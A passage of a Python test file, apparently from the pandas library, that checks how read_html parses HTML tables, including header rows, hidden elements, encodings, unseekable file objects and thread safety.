</tr>
<tr>
<td></td>
<td></td>
</tr>
</table>
"""
)[0]
expected = DataFrame(data=[["a", "b"], [np.nan, np.nan]], columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_ignore_empty_rows_when_inferring_header(self):
result = self.read_html(
"""
<table>
<thead>
<tr><th></th><th></tr>
<tr><th>A</th><th>B</th></tr>
<tr><th>a</th><th>b</th></tr>
</thead>
<tbody>
<tr><td>1</td><td>2</td></tr>
</tbody>
</table>
"""
)[0]
columns = MultiIndex(levels=[["A", "B"], ["a", "b"]], codes=[[0, 1], [0, 1]])
expected = DataFrame(data=[[1, 2]], columns=columns)
tm.assert_frame_equal(result, expected)
def test_multiple_header_rows(self):
# Issue #13434
expected_df = DataFrame(
data=[("Hillary", 68, "D"), ("Bernie", 74, "D"), ("Donald", 69, "R")]
)
expected_df.columns = [
["Unnamed: 0_level_0", "Age", "Party"],
["Name", "Unnamed: 1_level_1", "Unnamed: 2_level_1"],
]
html = expected_df.to_html(index=False)
html_df = self.read_html(html)[0]
tm.assert_frame_equal(expected_df, html_df)
def test_works_on_valid_markup(self, datapath):
filename = datapath("io", "data", "html", "valid_markup.html")
dfs = self.read_html(filename, index_col=0)
assert isinstance(dfs, list)
assert isinstance(dfs[0], DataFrame)
@pytest.mark.slow
def test_fallback_success(self, datapath):
banklist_data = datapath("io", "data", "html", "banklist.html")
self.read_html(banklist_data, match=".*Water.*", flavor=["lxml", "html5lib"])
def test_to_html_timestamp(self):
rng = date_range("2000-01-01", periods=10)
df = DataFrame(np.random.randn(10, 4), index=rng)
result = df.to_html()
assert "2000-01-01" in result
@pytest.mark.parametrize(
"displayed_only,exp0,exp1",
[
(True, DataFrame(["foo"]), None),
(False, DataFrame(["foo bar baz qux"]), DataFrame(["foo"])),
],
)
def test_displayed_only(self, displayed_only, exp0, exp1):
# GH 20027
data = StringIO(
"""<html>
<body>
<table>
<tr>
<td>
foo
<span style="display:none;text-align:center">bar</span>
<span style="display:none">baz</span>
<span style="display: none">qux</span>
</td>
</tr>
</table>
<table style="display: none">
<tr>
<td>foo</td>
</tr>
</table>
</body>
</html>"""
)
dfs = self.read_html(data, displayed_only=displayed_only)
tm.assert_frame_equal(dfs[0], exp0)
if exp1 is not None:
tm.assert_frame_equal(dfs[1], exp1)
else:
assert len(dfs) == 1 # Should not parse hidden table
@pytest.mark.filterwarnings(
"ignore:You provided Unicode markup but also provided a value for "
"from_encoding.*:UserWarning"
)
def test_encode(self, html_encoding_file):
base_path = os.path.basename(html_encoding_file)
root = os.path.splitext(base_path)[0]
_, encoding = root.split("_")
try:
with open(html_encoding_file, "rb") as fobj:
from_string = self.read_html(
fobj.read(), encoding=encoding, index_col=0
).pop()
with open(html_encoding_file, "rb") as fobj:
from_file_like = self.read_html(
BytesIO(fobj.read()), encoding=encoding, index_col=0
).pop()
from_filename = self.read_html(
html_encoding_file, encoding=encoding, index_col=0
).pop()
tm.assert_frame_equal(from_string, from_file_like)
tm.assert_frame_equal(from_string, from_filename)
except Exception:
# seems utf-16/32 fail on windows
if is_platform_windows():
if "16" in encoding or "32" in encoding:
pytest.skip()
raise
def test_parse_failure_unseekable(self):
# Issue #17975
if self.read_html.keywords.get("flavor") == "lxml":
pytest.skip("Not applicable for lxml")
class UnseekableStringIO(StringIO):
def seekable(self):
return False
bad = UnseekableStringIO(
"""
<table><tr><td>spam<foobr />eggs</td></tr></table>"""
)
assert self.read_html(bad)
with pytest.raises(ValueError, match="passed a non-rewindable file object"):
self.read_html(bad)
def test_parse_failure_rewinds(self):
# Issue #17975
class MockFile:
def __init__(self, data):
self.data = data
self.at_end = False
def read(self, size=None):
data = "" if self.at_end else self.data
self.at_end = True
return data
def seek(self, offset):
self.at_end = False
def seekable(self):
return True
def __iter__(self):
# to fool `is_file_like`, should never end up here
assert False
good = MockFile("<table><tr><td>spam<br />eggs</td></tr></table>")
bad = MockFile("<table><tr><td>spam<foobr />eggs</td></tr></table>")
assert self.read_html(good)
assert self.read_html(bad)
@pytest.mark.slow
def test_importcheck_thread_safety(self, datapath):
# see gh-16928
class ErrorThread(threading.Thread):
def run(self):
try:
super().run()
except Exception as err:
self.err = err
else:
self.err = None
# force import check by reinitalising global vars in html.py
reload(pandas.io.html)
filename = datapath("io", "data", "html", "valid_markup.html")
helper_thread1 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread2 = ErrorThread(target=self.read_html, args=(filename,))
helper_thread1.start()
helper_thread2.start()
while helper_thread1.is_alive() or helper_thread2.is_alive():
pass
assert None is helper_thread1.err is helper_thread2.err
def test_parse_path_object(self, datapath):
# GH 37705
file_path_string = datapath("io", "data", "html", "spam.html")
file_path = Path(file_path_string)
df1 = self.read_html(file_path_string)[0]
df2 = self.read_html(file_path)[0]
tm.assert_frame_equal(df1, df2)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.